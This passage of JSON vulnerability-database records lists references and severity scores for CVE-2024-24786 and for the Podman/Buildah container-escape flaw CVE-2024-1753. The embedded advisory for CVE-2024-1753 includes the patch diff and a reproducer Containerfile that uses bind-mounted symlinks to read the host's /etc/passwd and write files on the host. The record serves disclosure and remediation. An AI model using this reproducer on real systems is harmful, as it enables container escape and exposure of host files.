coring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-11-07T16:22:27Z/"}],"url":"https://go.dev/cl/569356"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JDMBHAVSDU2FBDZ45U3A2VLSM35OJ2HU","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JDMBHAVSDU2FBDZ45U3A2VLSM35OJ2HU"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-24786","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-24786"},{"reference_url":"https://pkg.go.dev/vuln/GO-2024-2611","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-11-07T16:22:27Z/"}],"url":"https://pkg.go.dev/vuln/GO-2024-2611"},{"reference_url":"https://security.netapp.com/advisory/ntap-20240517-0002","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.netapp.com/advisory/ntap-20240517-0002"},{"reference_url":"http://www.openwall.com/lists/oss-security/2024/03/08/4","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-11-07T16:22:27Z/"}],"url":"http://www.openwall.com/lists/oss-security/2024/03/08/4"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1065684","reference_id":"1065684","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1065684"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2268046","reference_id":"2268046","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2268046"},{"reference_url":"https://security.gentoo.org/glsa/202407-12","reference_id":"GLSA-202407-12","reference_type":"","scores":[],"url":"https://security.gentoo.org/glsa/202407-12"},{"reference_url":"https://security.gentoo.org/glsa/202407-25","reference_id":"GLSA-202407-25","reference_type":"","scores":[],"url":"https://security.gentoo.org/glsa/202407-25"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JDMBHAVSDU2FBDZ45U3A2VLSM35OJ2HU/","reference_id":"JDMBHAVSDU2FBDZ45U3A2VLSM35OJ2HU","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-11-07T16:22:27Z/"}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JDMBHAVSDU2FBDZ45U3A2VLSM35OJ2HU/"},{"reference_url":"https://security.netapp.com/advisory/ntap-20240517-0002/","reference_id":"ntap-20240517-0002","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-11-07T16:22:27Z/"}],"url":"https://security.netapp.com/advisory/ntap-20240517-0002/"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:0040","reference_id":"RHSA-2024:0040","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:0040"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:0043","reference_id":"RHSA-2024:0043","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:0043"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:10852","reference_id":"RHSA-2024:10852","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:10852"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:1362","reference_id":"RHSA-2024:1362","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:1362"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:1363","reference_id":"RHSA-2024:1363","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:1363"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:1456","reference_id":"RHSA-2024:1456","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:1456"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:1461","reference_id":"RHSA-2024:1461","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:1461"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:1474","reference_id":"RHSA-2024:1474","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:1474"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:1507","reference_id":"RHSA-2024:1507","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:1507"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:1508","reference_id":"RHSA-2024:1508","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:1508"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:1537","reference_id":"RHSA-2024:1537","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:1537"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:1538","reference_id":"RHSA-2024:1538","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:1538"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:1616","reference_id":"RHSA-2024:1616","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:1616"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:1765","reference_id":"RHSA-2024:1765","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:1765"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:1795","reference_id":"RHSA-2024:1795","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:1795"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:1859","reference_id":"RHSA-2024:1859","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:1859"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:1874","reference_id":"RHSA-2024:1874","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:1874"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:1925","reference_id":"RHSA-2024:1925","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:1925"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:1946","reference_id":"RHSA-2024:1946","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:1946"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2096","reference_id":"RHSA-2024:2096","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:2096"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2549","reference_id":"RHSA-2024:2549","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:2549"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2550","reference_id":"RHSA-2024:2550","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:2550"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2639","reference_id":"RHSA-2024:2639","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:2639"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2666","reference_id":"RHSA-2024:2666","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:2666"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2773","reference_id":"RHSA-2024:2773","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:2773"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2781","reference_id":"RHSA-2024:2781","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:2781"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2874","reference_id":"RHSA-2024:2874","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:2874"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2901","reference_id":"RHSA-2024:2901","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:2901"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3316","reference_id":"RHSA-2024:3316","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3316"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3617","reference_id":"RHSA-2024:3617","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3617"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3621","reference_id":"RHSA-2024:3621","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3621"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3634","reference_id":"RHSA-2024:3634","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3634"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3635","reference_id":"RHSA-2024:3635","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3635"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3636","reference_id":"RHSA-2024:3636","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3636"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3637","reference_id":"RHSA-2024:3637","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3637"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3683","reference_id":"RHSA-2024:3683","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3683"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3715","reference_id":"RHSA-2024:3715","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3715"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3717","reference_id":"RHSA-2024:3717","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3717"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3868","reference_id":"RHSA-2024:3868","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:3868"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:4150","reference_id":"RHSA-2024:4150","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:4150"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:4163","reference_id":"RHSA-2024:4163","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:4163"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:4246","reference_id":"RHSA-2024:4246","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:4246"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:4455","reference_id":"RHSA-2024:4455","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:4455"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:4597","reference_id":"RHSA-2024:4597","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:4597"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:4626","reference_id":"RHSA-2024:4626","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:4626"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:5013","reference_id":"RHSA-2024:5013","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:5013"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:5054","reference_id":"RHSA-2024:5054","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:5054"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:5422","reference_id":"RHSA-2024:5422","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:5422"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:6004","reference_id":"RHSA-2024:6004","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:6004"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:6221","reference_id":"RHSA-2024:6221","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:6221"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:6409","reference_id":"RHSA-2024:6409","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:6409"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:7184","reference_id":"RHSA-2024:7184","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:7184"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:7548","reference_id":"RHSA-2024:7548","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:7548"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8040","reference_id":"RHSA-2024:8040","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8040"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8434","reference_id":"RHSA-2024:8434","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8434"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8676","reference_id":"RHSA-2024:8676","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8676"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8677","reference_id":"RHSA-2024:8677","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8677"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8704","reference_id":"RHSA-2024:8704","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8704"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:9615","reference_id":"RHSA-2024:9615","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:9615"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:0654","reference_id":"RHSA-2025:0654","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:0654"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:0664","reference_id":"RHSA-2025:0664","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:0664"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:4204","reference_id":"RHSA-2025:4204","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:4204"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:9776","reference_id":"RHSA-2025:9776","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:9776"},{"reference_url":"https://usn.ubuntu.com/6746-1/","reference_id":"USN-6746-1","reference_type":"","scores":[],"url":"https://usn.ubuntu.com/6746-1/"},{"reference_url":"https://usn.ubuntu.com/6746-2/","reference_id":"USN-6746-2","reference_type":"","scores":[],"url":"https://usn.ubuntu.com/6746-2/"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/76464?format=json","purl":"pkg:ebuild/app-containers/buildah@1.35.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:ebuild/app-containers/buildah@1.35.3"}],"aliases":["CVE-2024-24786","GHSA-8r3f-844c-mc37"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-f8ak-21d8-juff"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/16734?format=json","vulnerability_id":"VCID-gyyv-8fkv-syh5","summary":"Podman affected by CVE-2024-1753 container escape at build time\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nUsers running containers with root privileges allowing a container to run with read/write access to the host system files when selinux is not enabled.  With selinux enabled, some read access is allowed.\n\n### Patches\nFrom @nalind .  This is a patch for Buildah (https://github.com/containers/buildah).  Once fixed there, Buildah will be vendored into Podman.\n\n```\n# cat /root/cve-2024-1753.diff\n--- internal/volumes/volumes.go\n+++ internal/volumes/volumes.go\n@@ -11,6 +11,7 @@ import (\n \n \t\"errors\"\n \n+\t\"github.com/containers/buildah/copier\"\n \t\"github.com/containers/buildah/define\"\n \t\"github.com/containers/buildah/internal\"\n \tinternalParse \"github.com/containers/buildah/internal/parse\"\n@@ -189,7 +190,11 @@ func GetBindMount(ctx *types.SystemContext, args []string, contextDir string, st\n \t// buildkit parity: support absolute path for sources from current build context\n \tif contextDir != \"\" {\n \t\t// path should be /contextDir/specified path\n-\t\tnewMount.Source = filepath.Join(contextDir, filepath.Clean(string(filepath.Separator)+newMount.Source))\n+\t\tevaluated, err := copier.Eval(contextDir, newMount.Source, copier.EvalOptions{})\n+\t\tif err != nil {\n+\t\t\treturn newMount, \"\", err\n+\t\t}\n+\t\tnewMount.Source = evaluated\n \t} else {\n \t\t// looks like its coming from `build run --mount=type=bind` allow using absolute path\n \t\t// error out if no source is set\n```\n### Reproducer\n\nPrior to testing, as root, add a memorable username to `/etc/passwd` via adduser or your favorite editor.   Also create a memorably named file in `/`.  Suggest: `touch /SHOULDNTSEETHIS.txt` and `adduser SHOULDNTSEETHIS`.  After testing, remember to remove both the file and the user from your system.\n\nUse the following Containerfile\n\n```\n# cat ~/cve_Containerfile\nFROM alpine as base\n\nRUN ln -s / /rootdir\nRUN ln -s /etc /etc2\n\nFROM alpine\n\nRUN echo \"ls container root\"\nRUN ls -l /\n\nRUN echo \"With exploit show host root, not the container's root, and create /BIND_BREAKOUT in / on the host\"\nRUN --mount=type=bind,from=base,source=/rootdir,destination=/exploit,rw ls -l /exploit; touch /exploit/BIND_BREAKOUT; ls -l /exploit\n\nRUN echo \"With exploit show host /etc/passwd, not the container's, and create /BIND_BREAKOUT2 in /etc on the host\"\nRUN --mount=type=bind,rw,source=/etc2,destination=/etc2,from=base ls -l /; ls -l /etc2/passwd; cat /etc2/passwd; touch /etc2/BIND_BREAKOUT2; ls -l /etc2 \n```\n\n#### To Test\n\n##### Testing with an older version of Podman with the issue\n```\nsetenforce 0\npodman build -f ~/cve_Containerfile .\n```\n\nAs part of the printout from the build, you should be able to see the contents of the `/' and `/etc` directories, including the `/SHOULDNOTSEETHIS.txt` file that you created, and the contents of the `/etc/passwd` file which will include the `SHOULDNOTSEETHIS` user that you created.  In addition, the file `/BIND_BREAKOUT` and `/etc/BIND_BREAKOUT2` will exist on the host after the command is completed.  Be sure to remove those two files between tests.  \n\n```\npodman rm -a\npodman rmi -a\nrm /BIND_BREAKOUT\nrm /etc/BIND_BREAKOUT2\nsetenforce 1\npodman build -f ~/cve_Containerfile .\n```\nNeither the `/BIND_BREAKEOUT` or `/etc/BIND_BREAKOUT2` files should be created.  An error should be raised during the build when both files are trying to be created.  Also, errors will be raised when the build tries to display the contents of the `/etc/passwd` file, and nothing will be displayed from that file.  \n\nHowever, the files in both the `/` and `/etc` directories on the host system will be displayed.\n\n##### Testing with the patch\n\nUse the same commands as testing with an older version of Podman.\n\nWhen running using the patched version of Podman, regardless of the `setenforce` settings,  you should not see the file that you created or the user that you added.  Also the `/BIND_BREAKOUT` and the `/etc/BIND_BREAKOUT` will not exist on the host after the test completes.\n\nNOTE: With the fix, the contents of the `/` and `/etc` directories, and the `/etc/passwd` file will be displayed, however, it will be the file and contents from the container image, and NOT the host system.  Also the `/BIND_BREAKOUT` and `/etc/BIND_BREAKOUT` files will be created in the container image.\n\n\n### Workarounds\nEnsure selinux controls are in place to avoid compromising sensitive system files and systems.  With \"setenforce 0\" set, which is not at all advised, the root file system is open for modification with this exploit.  With \"setenfoce 1\" set, which is the recommendation, files can not be changed.  However, the contents of the `/` directory can be displayed.  I.e., `ls -alF /` will show the contents of the host directory.\n\n### References\n\nUnknown.","references":[{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2049","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:2049"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2055","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:2055"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2064","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:2064"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2066","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:2066"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2077","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:2077"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2084","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:2084"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2089","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:2089"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2090","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:2090"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2097","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:2097"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2098","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:2098"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:2548","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E